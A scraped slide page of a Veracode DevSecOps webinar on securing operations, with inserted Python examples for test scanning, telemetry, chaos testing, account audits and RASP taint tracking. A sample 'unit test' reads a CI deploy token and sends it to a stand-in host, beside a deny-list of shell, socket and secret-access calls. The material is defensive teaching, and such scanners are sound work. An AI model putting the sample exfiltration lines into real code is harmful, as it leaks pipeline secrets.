© 2017 VERACODE INC.
How to Get the Best Out of DevSecOps
The Operations Perspective
Introduction
About This Webinar
https://www.brighttalk.com/webcast/12807/252395
Colin Domoney
Senior Product Innovation Manager
@colindomoney
Further Reading
Kim, Gene, Kevin Behr, and George Spafford. 2013. The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win.
Kim, Gene, Patrick Debois, and John Willis. 2016. The DevOps Handbook: How to Create World-Class Agility, Reliability, and Security in Technology Organizations.
Beyer, Betsy, Jennifer Petoff, Chris Jones, and Niall Richard Murphy. 2016. Site Reliability Engineering: How Google Runs Production Systems. 1st edition. O'Reilly.
Humble, Jez, and David Farley. 2010. Continuous Delivery: Reliable Software Releases Through Build, Test, and Deployment Automation.
‘2016 State of DevOps Report’. Puppet. Accessed January 23, 2017. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
What is Dev(Sec)Ops
A Cultural Clash
What is Dev(Sec) Ops?
“DevOps is the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support.”
“DevOps is also characterized by operations staff making use of many of the same techniques as developers for their systems work.”
Source: ‘What Is DevOps?’ 2010. The Agile Admin. August 2. https://theagileadmin.com/what-is-devops/.
The First Way : Systems Thinking
The First Way emphasizes the performance of the entire system, as opposed to the performance of a specific silo of work or department.
• Never pass a known defect to a downstream work centre
• Never allow local optimization to create global degradation
• Always seek to increase flow
• Always seek to achieve profound understanding of the system (per Deming)
Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
The Second Way : Amplify Feedback Loops
The Second Way is about creating the right-to-left feedback loops.
• Understand and respond to all customers, internal and external
• Shorten and amplify all feedback loops
• Embed knowledge where you need it
Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
The Third Way : Continual Experimentation and Learning
The Third Way is about creating a culture that fosters two things: continual experimentation, taking risks and learning from failure; and understanding that repetition and practice are the prerequisite to mastery.
• Allocate time for the improvement of daily work
• Create rituals that reward the team for taking risks
• Introduce faults into the system to increase resilience
Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
The Benefits of DevOps
• High-performing organizations are decisively outperforming their
lower-performing peers in terms of throughput.
• High performers have better employee loyalty,
as measured by employee Net Promoter Score (eNPS).
• Improving quality is everyone’s job.
• High performers spend 50 percent less time remediating security
issues than low performers.
• Taking an experimental approach to product development can
improve your IT and organizational performance.
• Undertaking a technology transformation initiative can produce
sizeable cost savings for any organization.
Source: ‘2016 State of DevOps Report’. Puppet. Accessed January 23, 2017. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
DevOps Maturity Model
Initial
• Poor, ad hoc communication
• No automation
• Unpredictable, uncontrolled reactive process
Managed
• Managed communication, some shared decision making
• Siloed automation, no central infrastructure
• Processes are managed but not standardised
Defined
• Collaboration, shared decision making and accountability
• Central automated processes across the application lifecycle
• Processes are standardised across the organisation
Measured
• Collaboration-based processes are measured to identify inefficiencies and bottlenecks
• Collect and analyse metrics of the automated processes and measure against the business goals
• Visibility and predictability of entire process quality and performance
Optimised
• Effective knowledge sharing and individual empowerment
• Self-service automation, self-learning using analytics and self-remediation
• Process risk and cost optimisation
The Move to DevOps
Market trends and enabling technologies
Before We Had DevOps
Cloud Technology and CI/CD Platforms
Configuration Management Tools
What Makes a Good DevSecOps Solution?
• Fail quickly, through automation: provide security feedback as early as possible, in the DevOps tools themselves
• Limit time-to-market impact: ease of use, actionable findings, speed, low false positives
• Support team autonomy with enterprise orchestration: provide privacy early in the SDLC; measure and assess teams, compliance and risk later
• Adapt to the latest practices and technologies: microservices, Infrastructure as Code, leading-edge languages and frameworks, containerization
• Support a culture of learning and openness: developer communities, small consumable courses, open documentation, integrations in marketplaces
• Provide operational visibility: feed back from Ops (Prod and QA) about risks and attacks in a way that is consumable by development
The Impact to Operations
Three Cornerstones
• Collaboration
– Previously very little crossover between teams, with narrowly defined roles and responsibilities
– Now teams collaborate flexibly through flexible tools (e.g. Slack)
• Flexibility
– Previously focused on stability over everything else
– Modern organisations need to be flexible and responsive
• Automation
– Manual changes cannot keep pace with the rapid turnaround times required
– Automation frees up people for critical thinking and problem solving
“Infrastructure as Code”
https://puppet.com/blog/what-is-infrastructure-as-code
Site Reliability Engineering - It’s all Software Now
• Defined by Ben Treynor as "what happens when a software engineer is tasked with what used to be called operations".
• The ideal SRE candidate is a coder who also has operational and systems knowledge and likes to whittle down complex tasks.
• SREs typically spend their time as follows:
– up to 50% of their time doing "ops" related work
– up to 50% of their time on development tasks such as new features, scaling or automation
https://en.wikipedia.org/wiki/Site_reliability_engineering
Best Practices for Securing Operations
Control Your Source Code Repositories
• Continuous Deployment means any code checked in can
potentially reach production within minutes
• Best practices include:
– Splitting repositories so that access to critical code can be scoped
– Using Perforce for fine-grained access control
– Performing peer reviews on ‘pull requests’ to critical code
Protect Your Deployment Pipeline
• Continuous Deployment means that your pipeline is a critical piece of
infrastructure
• Best practices include:
– Hardening CI/CD systems to prevent compromise
– Reviewing changes to prevent execution of unwanted code
– Testing for suspicious API calls in unit tests or scripts
– Ensuring CI/CD jobs run in isolated containers
– Ensuring the VCS credentials used by the pipeline are ‘read only’
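One way to put the "suspicious API calls in unit tests or scripts" check into the pipeline is to parse every test file before CI runs it and fail the job if a test spawns processes, opens sockets, makes HTTP requests, reads the CI environment (where deploy tokens live) or executes dynamic code. The following is an added example written for this page, not Veracode's or any project's tooling; the deny-list and the sample test file are constructed assumptions to tune per code base.

```python
"""Flag suspicious API calls in Python test files before CI executes them.

Added example, not a tool from the original slides. The deny-list is an
assumed starting point: calls a unit test rarely has a legitimate need for.
"""
import ast
import sys

# Assumed deny-list of fully-qualified call targets: process spawning, raw
# sockets, outbound HTTP, CI environment (secrets) access, dynamic code execution.
SUSPICIOUS_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "os.execv",
    "socket.socket", "socket.create_connection",
    "urllib.request.urlopen", "requests.get", "requests.post",
    "os.environ.get", "os.getenv",
    "eval", "exec", "compile", "__import__",
}


def _alias_map(tree):
    """Map local names to what they were imported as, so that
    'import subprocess as sp' or 'from os import environ' still resolve."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node, aliases):
    """Render a call target such as sp.run as its canonical 'subprocess.run'."""
    if isinstance(node, ast.Name):
        return aliases.get(node.id, node.id)
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value, aliases)
        return f"{base}.{node.attr}" if base else None
    return None  # calls on computed objects, e.g. x().y(), are not resolved


def find_suspicious_calls(source, filename="<script>"):
    """Return (filename, line, target) tuples, sorted by line, for each hit."""
    tree = ast.parse(source, filename=filename)
    aliases = _alias_map(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            target = _dotted_name(node.func, aliases)
            if target in SUSPICIOUS_CALLS:
                findings.append((filename, node.lineno, target))
        # os.environ["TOKEN"] is a subscript, not a call, so check it separately
        elif isinstance(node, ast.Subscript) and \
                _dotted_name(node.value, aliases) == "os.environ":
            findings.append((filename, node.lineno, "os.environ[...]"))
    return sorted(findings, key=lambda f: f[1])


# Constructed sample: a "unit test" that leaks a CI secret and runs a command.
SAMPLE_TEST = """
import os
import subprocess as sp
from urllib.request import urlopen

def test_addition():
    assert 1 + 1 == 2

def test_helper():
    token = os.environ["CI_DEPLOY_TOKEN"]
    urlopen("https://example.invalid/collect?t=" + token)
    sp.run(["curl", "-s", "https://example.invalid/"])
"""


def main(paths):
    """Scan the files given on the command line (or the sample) and return a
    non-zero exit status so the CI job fails before the tests are executed."""
    sources = [(p, open(p, encoding="utf-8").read()) for p in paths] or \
              [("sample_test.py", SAMPLE_TEST)]
    findings = [f for name, src in sources for f in find_suspicious_calls(src, name)]
    for filename, line, target in findings:
        print(f"{filename}:{line}: suspicious call {target}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it as a pipeline stage before the test runner (`python scan_tests.py tests/*.py`); the alias map is what stops a trivial `import subprocess as sp` from slipping past the check, while calls on computed objects are a known blind spot that code review still has to cover.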
Using Security Testing Tools
• Behaviour-driven development security testing
• IDE integrations for security testing
Integrate Security Into Your Deployment Pipeline - VSTS/TFS
Integrate Security Into Your Deployment Pipeline - Jenkins
Security Telemetry in Applications
• Record all security relevant events such as:
– Successful and unsuccessful logins
– User password resets
– User e-mail address resets
– User credit card changes
• Monitor changes in the ratio of successes to failures
• Alert on events such as:
– Anomalous behaviour
– Sudden changes in values
Security Telemetry in the Environment
• Monitor environmental items and events such as:
– OS changes
– Security group changes
– Changes to configurations
– Cloud infrastructure changes
– Web server errors
Use the Right Tool for the Job
https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a-continuous-deployment-environment
Case Study : Security Telemetry at Etsy
• Nick Galbreath (Director of Engineering at Etsy, 2010):
– No dedicated fraud control or Infosec team
– Embedded telemetry with entire DevOps value stream
– Everyone was responsible for monitoring and alerting
• Example events:
– Abnormal program termination (segfaults)
– Database syntax error
– Indications of SQL attack
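The two telemetry slides above (recording login outcomes and alerting on a sudden change in the success/failure ratio, and the Etsy practice of treating database syntax errors and crashes as attack indicators) come together in a small detector. The following is an added example written for this page, not Etsy's or Veracode's code: the key=value log format, the window size, the thresholds and the sample lines are all constructed for illustration.

```python
"""Security telemetry over application log lines.

Added example for the application-telemetry and Etsy slides; the log format,
thresholds and sample lines are constructed, not taken from either.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timezone

WINDOW_SECONDS = 60   # assumed aggregation window
RATIO_JUMP = 0.3      # assumed: alert if the failure ratio rises by > 0.3 vs the previous window
MIN_EVENTS = 10       # assumed: ignore windows too small to be meaningful
# Events that are attack indicators on their own (the Etsy approach): a syntax
# error from the database layer means untrusted input reached a query, and a
# crash may be an exploitation attempt.
ATTACK_INDICATORS = {"db_syntax_error", "segfault"}


def parse_line(line):
    """Parse 'ts=2017-01-23T10:00:00Z event=login outcome=failure user=bob ...'
    into a dict; shlex keeps quoted values such as msg='...' together."""
    fields = dict(token.partition("=")[::2] for token in shlex.split(line))
    fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ") \
        .replace(tzinfo=timezone.utc)
    return fields


def window_of(ts):
    """Bucket a timestamp into the start (epoch seconds) of its fixed window."""
    epoch = int(ts.timestamp())
    return epoch - epoch % WINDOW_SECONDS


def analyse(lines):
    """Return (per-window login counts, alerts) for an iterable of log lines."""
    logins = defaultdict(lambda: {"success": 0, "failure": 0})
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev["event"] == "login":
            logins[window_of(ev["ts"])][ev["outcome"]] += 1
        elif ev["event"] in ATTACK_INDICATORS:
            alerts.append(f"{ev['event']} src={ev.get('src', '?')} msg={ev.get('msg', '')}")
    # Sudden change in the success/failure ratio: compare each window with the previous one
    previous = None
    for w in sorted(logins):
        counts = logins[w]
        total = counts["success"] + counts["failure"]
        ratio = counts["failure"] / total if total else 0.0
        if previous is not None and total >= MIN_EVENTS and ratio - previous > RATIO_JUMP:
            start = datetime.fromtimestamp(w, timezone.utc)
            alerts.append(f"login failure ratio jumped {previous:.2f} -> {ratio:.2f} "
                          f"in window starting {start:%H:%M:%S}")
        previous = ratio
    return dict(logins), alerts


def constructed_sample():
    """Constructed log: a quiet minute, then a credential-stuffing burst and an SQLi probe."""
    lines = []
    for i in range(20):
        outcome = "failure" if i < 2 else "success"
        lines.append(f"ts=2017-01-23T10:00:{i:02d}Z event=login outcome={outcome} user=user{i}")
    for i in range(20):
        outcome = "failure" if i < 15 else "success"
        lines.append(f"ts=2017-01-23T10:01:{i:02d}Z event=login outcome={outcome} "
                     f"user=user{i} src=203.0.113.9")
    lines.append("ts=2017-01-23T10:01:30Z event=db_syntax_error src=203.0.113.9 "
                 "msg='syntax error near OR 1=1'")
    return lines


if __name__ == "__main__":
    for alert in analyse(constructed_sample())[1]:
        print(alert)
```

On the sample the detector raises two alerts: the database syntax error from 203.0.113.9 fires immediately, and the login failure ratio jumping from 0.10 to 0.75 fires once the second window is complete. Comparing windows against each other, rather than against a fixed failure count, is what makes the ratio check robust to normal traffic growth.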
Automated Dashboards – “Measure All The Things”
“Security Is Not A Binary Event”
https://www.slideshare.net/nickgsuperstar/devopssec-apply-devops-principles-to-security
Logging for Security
• Logs are the ‘bread and butter’ of an IT Operations team
• Challenges when used in a security context:
– Delayed response: delays in alerting make it slow to identify issues
– Limited data: no POST body, no header data
– Limited context: disparate events spread across several locations
Source: Phillip Maddux, https://medium.com/@foospidy
Destructive Testing / Chaos Engineering
Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. It follows four steps:
• Build a hypothesis around steady-state behaviour.
• Vary real-world events.
• Run experiments in production.
• Automate experiments to run continuously.
“The best way to avoid failure is to fail constantly.” - Jeff Atwood
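The four steps are easier to see as code. The following is an added example written for this page, not Netflix's tooling or anything from the original slides: a simulated product page with a recommendations dependency stands in for the production system, the injected dependency failure is the "real-world event", and the 99% success threshold is an assumed steady-state hypothesis. The two variants (with and without graceful degradation) show the kind of result a chaos experiment exists to surface.

```python
"""A minimal chaos experiment following the four steps above.

Added example with a simulated service; the service, the fault model and the
99% threshold are assumptions. In a real run the traffic would be production
requests with a deliberately bounded blast radius.
"""
import random


class DependencyDown(Exception):
    """Raised by the recommendations dependency while the fault is injected."""


class Recommendations:
    """Downstream service; failure_rate is the injected real-world event."""

    def __init__(self, failure_rate=0.0, rng=None):
        self.failure_rate = failure_rate
        self.rng = rng or random.Random(0)

    def fetch(self, user):
        if self.rng.random() < self.failure_rate:
            raise DependencyDown(f"recommendations unavailable for {user}")
        return [f"item-{user}-{i}" for i in range(3)]


def render_product_page(recs, user, degrade_gracefully=True):
    """Return an HTTP-like status. With graceful degradation the page is served
    without the recommendations widget; without it, the dependency failure
    becomes a user-visible error."""
    try:
        recs.fetch(user)
    except DependencyDown:
        return 200 if degrade_gracefully else 500
    return 200


def steady_state_holds(statuses, min_success=0.99):
    """Step 1, the hypothesis: at least 99% of page loads succeed."""
    return sum(1 for s in statuses if s == 200) / len(statuses) >= min_success


def run_experiment(failure_rate, degrade_gracefully, requests=1000, seed=1):
    """Steps 2 and 3: inject the event, drive traffic, report the outcome.
    The fixed seed makes the run repeatable, which step 4 relies on."""
    recs = Recommendations(failure_rate, random.Random(seed))
    statuses = [render_product_page(recs, f"user{i}", degrade_gracefully)
                for i in range(requests)]
    ok = sum(1 for s in statuses if s == 200)
    return {"failure_rate": failure_rate, "degrade_gracefully": degrade_gracefully,
            "success_ratio": ok / requests, "hypothesis_holds": steady_state_holds(statuses)}


def run_suite(rates=(0.0, 0.1, 0.5)):
    """Step 4: the set of experiments a scheduler would run continuously;
    returns the runs whose hypothesis failed so the pipeline can alert on them."""
    results = [run_experiment(r, degrade) for r in rates for degrade in (True, False)]
    return [r for r in results if not r["hypothesis_holds"]]


if __name__ == "__main__":
    for failed in run_suite():
        print(f"hypothesis FAILED: dependency failure rate {failed['failure_rate']:.0%}, "
              f"graceful degradation {failed['degrade_gracefully']}, "
              f"success ratio {failed['success_ratio']:.3f}")
```

With the fallback in place the steady state survives even a 50% dependency failure rate; without it, a 10% failure rate already breaks the hypothesis. That gap is the finding: the experiment tells you which code paths need graceful degradation before a real outage does.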
Case Study : Netflix
Operating System Hardening
• Disable unused and/or guest accounts
• Run services at the lowest level of privilege they need
• Disable unused services
• Ensure automatic updates are enabled
• Ensure strong passwords are used
• Disable overly verbose logging, which can leak secrets and personal data into log files
• Ensure backups are performed
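Several of the account-related items in that list can be checked mechanically rather than by eye. The following is an added example written for this page, not a tool from the original slides: it parses the /etc/passwd and /etc/shadow formats and reports additional UID 0 accounts, interactive accounts with an empty password, guest-style accounts that are not locked, and weak MD5 ($1$) password hashes. The sample files and the list of accounts that should be locked are constructed assumptions; on a real host it has to run as root to read /etc/shadow.

```python
"""Audit local accounts against the OS hardening list above.

Added example, not from the original slides. SHOULD_BE_LOCKED and the sample
passwd/shadow content are constructed assumptions.
"""
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}
SHOULD_BE_LOCKED = {"guest", "games"}   # assumed list of unused/guest accounts


def parse_passwd(text):
    """name -> {'uid', 'shell'} from passwd lines (name:x:uid:gid:gecos:home:shell)."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "shell": shell}
    return users


def parse_shadow(text):
    """name -> password hash field from shadow lines (name:hash:lastchg:...)."""
    return {line.split(":", 2)[0]: line.split(":", 2)[1]
            for line in text.splitlines() if line and not line.startswith("#")}


def audit_accounts(passwd_text, shadow_text):
    """Return sorted (account, finding) pairs for the checks listed above."""
    findings = []
    hashes = parse_shadow(shadow_text)
    for name, user in parse_passwd(passwd_text).items():
        pw_hash = hashes.get(name, "")
        locked = pw_hash.startswith(("!", "*"))      # locked or no password login
        interactive = user["shell"] in INTERACTIVE_SHELLS
        if user["uid"] == 0 and name != "root":
            findings.append((name, "additional UID 0 account"))
        if interactive and pw_hash == "":
            findings.append((name, "interactive shell with empty password"))
        if name in SHOULD_BE_LOCKED and not locked:
            findings.append((name, "guest/unused account not locked"))
        if pw_hash.startswith("$1$"):
            findings.append((name, "weak MD5 password hash"))
    return sorted(findings)


# Constructed sample files: a guest account with no password, a second UID 0
# account and one user still on an MD5 hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
guest:x:1001:1001:Guest:/home/guest:/bin/bash
bob:x:1002:1002:Bob:/home/bob:/bin/zsh
svc:x:0:0:service:/root:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$salt$roothash:17189:0:99999:7:::
daemon:*:17189:0:99999:7:::
alice:$6$salt$alicehash:17189:0:99999:7:::
guest::17189:0:99999:7:::
bob:$1$salt$bobhash:17189:0:99999:7:::
svc:$6$salt$svchash:17189:0:99999:7:::
"""


if __name__ == "__main__":
    try:
        passwd, shadow = open("/etc/passwd").read(), open("/etc/shadow").read()
    except OSError:   # not root, or not a Unix host: fall back to the sample
        passwd, shadow = SAMPLE_PASSWD, SAMPLE_SHADOW
    for account, finding in audit_accounts(passwd, shadow):
        print(f"{account}: {finding}")
```

Wire it into configuration management so it runs after every converge; a finding for an account nobody remembers creating is exactly the "unused account" the slide is asking you to disable.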
Runtime Application Self Protection
What is RASP?
• An ‘agent’ that executes in parallel with an application and provides run-time protection by monitoring traffic through the application.
• Data propagation is tracked through the application to determine whether input data is ‘tainted’ during its lifetime.
• If data is tainted then it is possible that the application is under attack, and the agent can then protect the application at run-time.
Benefits of RASP
• Very low false positives and false negatives.
• Requires no modification to application source code.
• Can report attack information into a SIEM.
• Can be deployed onto legacy applications and platforms.
• Can execute in ‘monitor’ or ‘alert’ mode to identify attacks without protecting the application (IAST).
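The taint-tracking idea behind RASP is concrete enough to show in a few dozen lines. The following is an added illustration written for this page, not any RASP product's implementation: a real agent instruments the runtime or framework so every string operation and every sink is covered, whereas here only the common string operations are overridden, which is enough to show how taint follows request data into a SQL sink and how the ‘block’ and ‘monitor’ modes differ. The toy request source, the SQLite table and all names are assumptions.

```python
"""Taint propagation of the kind a RASP agent performs, as an added illustration.

Not any product's implementation; the request source, the SQLite table and the
names are assumptions made for this example.
"""
import sqlite3


class SecurityError(Exception):
    """Raised by the sink when tainted data is about to be executed as code."""


class Tainted(str):
    """A str that remembers it came from an untrusted source (request input).
    Operations that build new strings from it return Tainted strings, so the
    taint follows the data through the application."""
    tainted = True

    def __add__(self, other):
        return Tainted(str.__add__(self, other))

    def __radd__(self, other):            # "SELECT ... '" + tainted
        return Tainted(str.__add__(other, self))

    def __getitem__(self, key):           # slicing keeps the taint
        return Tainted(str.__getitem__(self, key))

    def strip(self, *args):
        return Tainted(str.strip(self, *args))

    def upper(self):
        return Tainted(str.upper(self))

    def lower(self):
        return Tainted(str.lower(self))

    def replace(self, *args):
        return Tainted(str.replace(self, *args))


def from_request(value):
    """Everything that arrives from the client enters the application as Tainted."""
    return Tainted(value)


class GuardedConnection:
    """The sink: wraps sqlite3 so that every execute() is inspected first.
    mode='block' raises on tainted SQL text; mode='monitor' records the attack
    and lets the query run, which is the monitor/alert deployment above."""

    def __init__(self, conn, mode="block"):
        self.conn, self.mode, self.attacks = conn, mode, []

    def execute(self, sql, params=()):
        if getattr(sql, "tainted", False):
            self.attacks.append(str(sql))        # what a real agent would send to the SIEM
            if self.mode == "block":
                raise SecurityError(f"tainted SQL text blocked: {sql}")
        # Bound parameters are data, never parsed as SQL, so taint there is harmless
        params = tuple(str(p) if isinstance(p, Tainted) else p for p in params)
        return self.conn.execute(str(sql), params)


def setup_db(mode="block"):
    """In-memory users table (constructed data) behind the guarded connection."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return GuardedConnection(conn, mode)


def lookup_vulnerable(db, name):
    """String-built query: the taint on `name` spreads into the SQL text."""
    return db.execute("SELECT name FROM users WHERE name = '" + name + "'").fetchall()


def lookup_parameterised(db, name):
    """Bound parameter: the SQL text stays clean, the value never becomes code."""
    return db.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
```

In block mode the string-built query carrying `' OR 1=1 --` never reaches the database, while the same value passed as a bound parameter simply matches no rows; in monitor mode the injected query runs and returns every user, but the attack is recorded, which is the trade-off the slide describes.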
Change Management Process
• The ITIL change management process defines three types of change:
– Standard (low risk, follows a pre-approved standard process, can be automated)
– Normal (requires approval by the Change Advisory Board (CAB), manual process)
– Emergency (high priority, expedited CAB)
• Too many changes are classified as ‘normal’
• DevOps best practice suggests:
– Try to make as many changes as possible ‘standard’ and auto-approve them
– Optimise the CAB process for the requests that remain ‘normal’
Make a Commitment
• Learn how to code!
• Learn the ‘tools of the trade’ (Git, Ansible, etc.)
• Learn the basics with a test application, e.g. WebGoat.NET
• Learn how a Version Control System works
• Automate a repetitive task
• Experience a ‘Day in the Life’ of a Developer
Security is Everyone’s Responsibility
Thank You!
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 

How to get the best out of DevSecOps - an operations perspective

  • 1. © 2017 VERACODE INC. How to Get the Best Out Of DevSecOps: The Operations Perspective
  • 2. Introduction
  • 3. About This Webinar
    https://www.brighttalk.com/webcast/12807/252395
    Colin Domoney, Senior Product Innovation Manager, @colindomoney
  • 4. Further Reading
    – Kim, Gene, Kevin Behr, and George Spafford. 2013. The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win.
    – Kim, Gene, Patrick Debois, and John Willis. 2016. The DevOps Handbook: How to Create World-Class Agility, Reliability, and Security in Technology Organizations.
    – Beyer, Betsy, Jennifer Petoff, Chris Jones, and Niall Richard Murphy. 2016. Site Reliability Engineering: How Google Runs Production Systems. 1st edition. O'Reilly.
    – Humble, Jez, and David Farley. 2010. Continuous Delivery: Reliable Software Releases Through Build, Test, and Deployment Automation.
    – ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
  • 5. What is Dev(Sec)Ops
  • 6. A Cultural Clash
  • 7. What is Dev(Sec)Ops?
    “DevOps is the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support.”
    “DevOps is also characterized by operations staff making use of many of the same techniques as developers for their systems work.”
    Source: ‘What Is DevOps?’ 2010. The Agile Admin. August 2. https://theagileadmin.com/what-is-devops/.
  • 8. The First Way: Systems Thinking
    The First Way emphasizes the performance of the entire system, as opposed to the performance of a specific silo of work or department.
    • Never pass a known defect to a downstream work centre
    • Never allow local optimization to create global degradation
    • Always seek to increase flow
    • Always seek to achieve profound understanding of the system (per Deming)
    Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
  • 9. The Second Way: Amplify Feedback Loops
    The Second Way is about creating the right-to-left feedback loops.
    • Understand and respond to all customers, internal and external
    • Shorten and amplify all feedback loops
    • Embed knowledge where you need it
    Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
  • 10. The Third Way: Continual Experimentation and Learning
    The Third Way is about creating a culture that fosters two things: continual experimentation, taking risks and learning from failure; and understanding that repetition and practice are the prerequisite to mastery.
